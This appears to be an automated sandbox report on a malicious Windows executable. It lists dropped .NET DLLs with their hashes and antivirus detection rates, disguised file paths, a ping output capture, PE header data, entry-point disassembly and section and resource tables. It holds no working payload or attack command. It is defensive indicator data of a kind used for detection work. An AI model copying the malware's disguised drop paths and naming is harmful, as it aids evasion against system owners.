                                                                                                                      SSDEEP:384:aShD1nf4AeGAJVdBb9h2d7WNrFBo29TZHD1qPPPPPDPC2C6/Xa3c4J9UbWr4e169:aSPUrJVH94sDBLVZHxqPPPPPDPC2C6/X
                                                                                                                      MD5:5420053AF2D273C456FB46C2CDD68F64
                                                                                                                      SHA1:EA1808D7A8C401A68097353BB51A85F1225B429C
                                                                                                                      SHA-256:A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
                                                                                                                      SHA-512:DD4C7625A1E8222286CE8DD3FC94B7C0A053B1AD3BF28D848C65E846D04A721EA4BFFAFA234A4A96AB218CEE3FC1F5788E996C6A6DD56E5A9AB41158131DFD4B
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):69632
                                                                                                                      Entropy (8bit):5.932541123129161
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                                      MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                                      SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                                      SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                                      SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                      • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                      Process:C:\ChainagentComponent\ChainFontruntimeCrt.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):32768
                                                                                                                      Entropy (8bit):5.645950918301459
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                                                                                      MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                                                                                      SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                                                                                      SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                                                                                      SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                      • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):85504
                                                                                                                      Entropy (8bit):5.8769270258874755
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                                                      MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                                                      SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                                                      SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                                                      SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                      • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                      Process:C:\ChainagentComponent\ChainFontruntimeCrt.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):69632
                                                                                                                      Entropy (8bit):5.932541123129161
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                                      MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                                      SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                                      SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                                      SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                      • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                      Process:C:\ChainagentComponent\ChainFontruntimeCrt.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):24576
                                                                                                                      Entropy (8bit):5.535426842040921
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:aShD1nf4AeGAJVdBb9h2d7WNrFBo29TZHD1qPPPPPDPC2C6/Xa3c4J9UbWr4e169:aSPUrJVH94sDBLVZHxqPPPPPDPC2C6/X
                                                                                                                      MD5:5420053AF2D273C456FB46C2CDD68F64
                                                                                                                      SHA1:EA1808D7A8C401A68097353BB51A85F1225B429C
                                                                                                                      SHA-256:A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
                                                                                                                      SHA-512:DD4C7625A1E8222286CE8DD3FC94B7C0A053B1AD3BF28D848C65E846D04A721EA4BFFAFA234A4A96AB218CEE3FC1F5788E996C6A6DD56E5A9AB41158131DFD4B
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):33792
                                                                                                                      Entropy (8bit):5.541771649974822
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                                                      MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                                                      SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                                                      SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                                                      SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 38%
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):32256
                                                                                                                      Entropy (8bit):5.631194486392901
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                                      MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                                      SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                                      SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                                      SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                      Process:C:\ChainagentComponent\ChainFontruntimeCrt.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):85504
                                                                                                                      Entropy (8bit):5.8769270258874755
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                                                      MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                                                      SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                                                      SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                                                      SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                      • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                      Process:C:\ChainagentComponent\ChainFontruntimeCrt.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):33792
                                                                                                                      Entropy (8bit):5.541771649974822
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                                                      MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                                                      SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                                                      SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                                                      SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 38%
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):28160
                                                                                                                      Entropy (8bit):5.570953308352568
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:BBOVNMHHPrq2YQGpX0dx+D4uuMig590gQDhJvoKfqeXOWnKNey/B/HM/g/6Y70FB:LOCPAEdx+vuNgD0gQ/gCYoTyn+
                                                                                                                      MD5:A4F19ADB89F8D88DBDF103878CF31608
                                                                                                                      SHA1:46267F43F0188DFD3248C18F07A46448D909BF9B
                                                                                                                      SHA-256:D0613773A711634434DB30F2E35C6892FF54EBEADF49CD254377CAECB204EAA4
                                                                                                                      SHA-512:23AA30D1CD92C4C69BA23C9D04CEBF4863A9EA20699194F9688B1051CE5A0FAD808BC27EE067A8AA86562F35C352824A53F7FB0A93F4A99470A1C97B31AF8C12
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                      • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                      Process:C:\ChainagentComponent\ChainFontruntimeCrt.exe
                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):84
                                                                                                                      Entropy (8bit):5.181024494661447
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:fe7xGO5hrqpKkI35WnRu2D1jT:fbOrqe35I1jT
                                                                                                                      MD5:C34DD602BA3D07AA792A5D2B7F097BA8
                                                                                                                      SHA1:AB2945E33C5139E8339F970C12E36EADAE4875FA
                                                                                                                      SHA-256:205A3B9000B560F5F79014A413B44C23AE7F1E4C16F2762734C57712844CFD8B
                                                                                                                      SHA-512:DDF15C1A96276D70288FB95CA1D779800CAD56924AB4149170106964554E7C9BC9CDBB055BB850C0F837090DB2DD9A61BFB1BA058CE5E699709B2CDDD13ECE02
                                                                                                                      Malicious:false
                                                                                                                      Preview:jIIpJUwB5zoe5KVT7N3AONut3WbImAbWOcNUNBPEuEF5dJVvAuOnPCzWYZvx3oY4XRPc6BG67yPKIzPuApI1
                                                                                                                      Process:C:\ChainagentComponent\ChainFontruntimeCrt.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):2043904
                                                                                                                      Entropy (8bit):7.572623220967923
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:49152:McFZTdUJWxOOZPHst87uOLOkMRxJgSrSmMsc:MczpGWdZPHu9WuRx9rrJ
                                                                                                                      MD5:64105CB19AC25A6275C7D929937090A0
                                                                                                                      SHA1:4B0AB4A6FA17FEED05E183029F3A240D7860437D
                                                                                                                      SHA-256:CB2F1ACA28FCB0A43B1A256A1728A087EFED3D8144F0657C3DD5F4D5A0A6898C
                                                                                                                      SHA-512:7152D54DEF3FF633787549E7353330B949BB51AF3753B77A52B6FA24465CE635C985CBE28D7FC8ECBE4FE4E7B0B39933F79AD4E56817AAC45F8ABFFC0918E4B6
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 83%
                                                                                                                      Process:C:\Windows\System32\PING.EXE
                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):502
                                                                                                                      Entropy (8bit):4.613865166769504
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12:P+I5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:VdUOAokItULVDv
                                                                                                                      MD5:86BFC2C1B4A94049A33BB7DC01A2EF35
                                                                                                                      SHA1:66DEEC4292297FC78E3472EE805CD3328D47AAE5
                                                                                                                      SHA-256:9E931CB2BB00EB7D4CC205817A0CF84B68670C9BF44DF0CD13A68B27A460AE57
                                                                                                                      SHA-512:58EBFEC1F777E0627DF95F144D64856537DC90B3CD0489590C5E354EE19BCA7FD75B3AB2544630C161B0A6806B21AB14CF305E08F774302C9578641360F4C46A
                                                                                                                      Malicious:false
                                                                                                                      Preview:..Pinging 061544 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..
                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Entropy (8bit):7.5105013201167505
                                                                                                                      TrID:
                                                                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                                      • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                      • DOS Executable Generic (2002/1) 0.01%
                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                      File name:8k1e14tjcx.exe
                                                                                                                      File size:2'365'778 bytes
                                                                                                                      MD5:517d21cbe45c2a88930aa345c2a5c36b
                                                                                                                      SHA1:f8c2b259ed15eb455fc345f54a9ef9b0aace552c
                                                                                                                      SHA256:4b9cb0b6b953edda63999ddd41656c7c509cfb02298eaac8929010c29971cec9
                                                                                                                      SHA512:b912bf7ea3fc0e929890ce6048e89ab797b0ebf4b54e87989bdf4f2eb06cb68e1accd52200105c1079336ba57525aa200cd48c769e24ce1827906948d6f28d3f
                                                                                                                      SSDEEP:49152:IBJQcFZTdUJWxOOZPHst87uOLOkMRxJgSrSmMsce:yOczpGWdZPHu9WuRx9rrJT
                                                                                                                      TLSH:65B5BE0665D24F33C2746A318667023D53A0D7663B12EB4F7A1F20D6A917BF18A726F3
                                                                                                                      Icon Hash:1515d4d4442f2d2d
                                                                                                                      Entrypoint:0x41f530
                                                                                                                      Entrypoint Section:.text
                                                                                                                      Digitally signed:false
                                                                                                                      Imagebase:0x400000
                                                                                                                      Subsystem:windows gui
                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                      Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
                                                                                                                      TLS Callbacks:
                                                                                                                      CLR (.Net) Version:
                                                                                                                      OS Version Major:5
                                                                                                                      OS Version Minor:1
                                                                                                                      File Version Major:5
                                                                                                                      File Version Minor:1
                                                                                                                      Subsystem Version Major:5
                                                                                                                      Subsystem Version Minor:1
                                                                                                                      Import Hash:12e12319f1029ec4f8fcbed7e82df162
                                                                                                                      Instruction
                                                                                                                      call 00007FDB3D394A5Bh
                                                                                                                      jmp 00007FDB3D39436Dh
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      push ebp
                                                                                                                      mov ebp, esp
                                                                                                                      push esi
                                                                                                                      push dword ptr [ebp+08h]
                                                                                                                      mov esi, ecx
                                                                                                                      call 00007FDB3D3871B7h
                                                                                                                      mov dword ptr [esi], 004356D0h
                                                                                                                      mov eax, esi
                                                                                                                      pop esi
                                                                                                                      pop ebp
                                                                                                                      retn 0004h
                                                                                                                      and dword ptr [ecx+04h], 00000000h
                                                                                                                      mov eax, ecx
                                                                                                                      and dword ptr [ecx+08h], 00000000h
                                                                                                                      mov dword ptr [ecx+04h], 004356D8h
                                                                                                                      mov dword ptr [ecx], 004356D0h
                                                                                                                      ret
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      push ebp
                                                                                                                      mov ebp, esp
                                                                                                                      push esi
                                                                                                                      mov esi, ecx
                                                                                                                      lea eax, dword ptr [esi+04h]
                                                                                                                      mov dword ptr [esi], 004356B8h
                                                                                                                      push eax
                                                                                                                      call 00007FDB3D3977FFh
                                                                                                                      test byte ptr [ebp+08h], 00000001h
                                                                                                                      pop ecx
                                                                                                                      je 00007FDB3D3944FCh
                                                                                                                      push 0000000Ch
                                                                                                                      push esi
                                                                                                                      call 00007FDB3D393AB9h
                                                                                                                      pop ecx
                                                                                                                      pop ecx
                                                                                                                      mov eax, esi
                                                                                                                      pop esi
                                                                                                                      pop ebp
                                                                                                                      retn 0004h
                                                                                                                      push ebp
                                                                                                                      mov ebp, esp
                                                                                                                      sub esp, 0Ch
                                                                                                                      lea ecx, dword ptr [ebp-0Ch]
                                                                                                                      call 00007FDB3D387132h
                                                                                                                      push 0043BEF0h
                                                                                                                      lea eax, dword ptr [ebp-0Ch]
                                                                                                                      push eax
                                                                                                                      call 00007FDB3D3972B9h
                                                                                                                      int3
                                                                                                                      push ebp
                                                                                                                      mov ebp, esp
                                                                                                                      sub esp, 0Ch
                                                                                                                      lea ecx, dword ptr [ebp-0Ch]
                                                                                                                      call 00007FDB3D394478h
                                                                                                                      push 0043C0F4h
                                                                                                                      lea eax, dword ptr [ebp-0Ch]
                                                                                                                      push eax
                                                                                                                      call 00007FDB3D39729Ch
                                                                                                                      int3
                                                                                                                      jmp 00007FDB3D398D37h
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      push 00422900h
                                                                                                                      push dword ptr fs:[00000000h]
                                                                                                                      Programming Language:
                                                                                                                      • [ C ] VS2008 SP1 build 30729
                                                                                                                      • [IMP] VS2008 SP1 build 30729

| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x3d070 | 0x34 | .rdata |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3d0a4 | 0x50 | .rdata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x64000 | 0xdff8 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x72000 | 0x233c | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x3b11c | 0x54 | .rdata |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x355f8 | 0x40 | .rdata |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x33000 | 0x278 | .rdata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x3c5ec | 0x120 | .rdata |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |


| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x1000 | 0x31bdc | 0x31c00 | 2831bb8b11e3209658a53131886cdf98 | False | 0.5909380888819096 | data | 6.712962136932442 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rdata | 0x33000 | 0xaec0 | 0xb000 | 042f11346230ca5aa360727d9908e809 | False | 0.4579190340909091 | data | 5.261605615899847 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .data | 0x3e000 | 0x24720 | 0x1000 | 9670b581969e508258d8bc903025de5e | False | 0.451416015625 | data | 4.387459135575936 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .didat | 0x63000 | 0x190 | 0x200 | c83554035c63bb446c6208d0c8fa0256 | False | 0.4453125 | data | 3.3327310103022305 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0x64000 | 0xdff8 | 0xe000 | ba08fbcd0ed7d9e6a268d75148d9914b | False | 0.6373639787946429 | data | 6.638661032196024 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0x72000 | 0x233c | 0x2400 | 40b5e17755fd6fdd34de06e5cdb7f711 | False | 0.7749565972222222 | data | 6.623012966548067 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |


| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| PNG | 0x64650 | 0xb45 | PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced | English | United States | 1.0027729636048528 |
| PNG | 0x65198 | 0x15a9 | PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced | English | United States | 0.9363390441839495 |
| RT_ICON | 0x66748 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.47832369942196534 |
| RT_ICON | 0x66cb0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.5410649819494585 |
| RT_ICON | 0x67558 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.4933368869936034 |
| RT_ICON | 0x68400 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m | English | United States | 0.5390070921985816 |
| RT_ICON | 0x68868 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m | English | United States | 0.41393058161350843 |
| RT_ICON | 0x69910 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m | English | United States | 0.3479253112033195 |
| RT_ICON | 0x6beb8 | 0x3d71 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9809269502193401 |
| RT_DIALOG | 0x70588 | 0x286 | data | English | United States | 0.5092879256965944 |
| RT_DIALOG | 0x70358 | 0x13a | data | English | United States | 0.60828025477707 |
| RT_DIALOG | 0x70498 | 0xec | data | English | United States | 0.6991525423728814 |
| RT_DIALOG | 0x70228 | 0x12e | data | English | United States | 0.5927152317880795 |
| RT_DIALOG | 0x6fef0 | 0x338 | data | English | United States | 0.45145631067961167 |
| RT_DIALOG | 0x6fc98 | 0x252 | data | English | United States | 0.5757575757575758 |
| RT_STRING | 0x70f68 | 0x1e2 | data | English | United States | 0.3900414937759336 |
| RT_STRING | 0x71150 | 0x1cc | data | English | United States | 0.4282608695652174 |
| RT_STRING | 0x71320 | 0x1b8 | data | English | United States | 0.45681818181818185 |
| RT_STRING | 0x714d8 | 0x146 | data | English | United States | 0.5153374233128835 |
| RT_STRING | 0x71620 | 0x46c | data | English | United States | 0.3454063604240283 |
| RT_STRING | 0x71a90 | 0x166 | data | English | United States | 0.49162011173184356 |
| RT_STRING | 0x71bf8 | 0x152 | data | English | United States | 0.5059171597633136 |
| RT_STRING | 0x71d50 | 0x10a | data | English | United States | 0.49624060150375937 |
| RT_STRING | 0x71e60 | 0xbc | data | English | United States | 0.6329787234042553 |
| RT_STRING | 0x71f20 | 0xd6 | data | English | United States | 0.5747663551401869 |
| RT_GROUP_ICON | 0x6fc30 | 0x68 | data | English | United States | 0.7019230769230769 |
| RT_MANIFEST | 0x70810 | 0x753 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.3957333333333333 |


| DLL | Import |
|---|---|
